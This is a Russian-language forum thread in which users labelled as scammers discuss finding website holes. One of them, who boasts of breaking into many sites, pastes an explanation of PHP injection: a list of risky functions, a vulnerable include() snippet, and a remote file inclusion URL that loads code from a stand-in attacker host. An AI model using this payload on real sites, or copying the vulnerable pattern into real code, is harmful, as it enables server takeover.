Тема закрыта!
[мошенник] Alex Temedy, ставлю +, но о дырах знаю много! Мой сайт ламал Бродяга! Не ламанул! Делай виводы
Тему перенёс из подраздела Вопросы новичков в подраздел Халява/Бесплатные услуги/Поиск!
[мошенник] как на сайте найти язву?
[мошенник] MrAK, спасибо большое! Что перенес не подумал! Думал ето вопросы для новичков
[мошенник] Alex Temedy, я хочу хоть както! Им помоч! Много каво ламаю, и они просто здаються
[мошенник] уяжвимость ето PHP-инъекция
из способов взлома веб-сайтов, работающих на PHP, заключающийся в выполнении постороннего кода на
серверной стороне. Потенциально
опасными функциями являются: eval(),
preg_replace() (с модификатором «e»),
require_once(),
include_once(),
include(),
require(), create_function().
PHP-инъекция становится возможной, если
входные параметры принимаются и
используются без проверки.
Пример <? . . . $mo d u l e = $ _ G E T [ \' mo d u l e \' ] ; i n c l u d e ( $mo d u l e . \' . p h p \' ) ; . . . ?>
етот скрипт с переменой
Этот скрипт уязвим, так как к
содержимому переменной $mo d u l e просто прибавляется «.php» и по
полученному пути подключается файл. Взломщик может на своём сайте создать
файл, содержащий PHP-код ( h t t p : / / h a c k e r s i t e . c om/ i n c . p h p ), и зайдя на сайт по ссылке вроде h t t p : / /my s i t e . c om/ i n d e x . p h p ?mo d u l e = h t t p : / / h a c k e r s i t e . c om/ i n c выполнить любые PHP-команды.
Добавлено 04.10.13 в 08:24:31:
Думаю Суть поняк! Научишся писать скрипты! Тогда научишся и крить! А я расказую основное что надо знать вап мастерам!
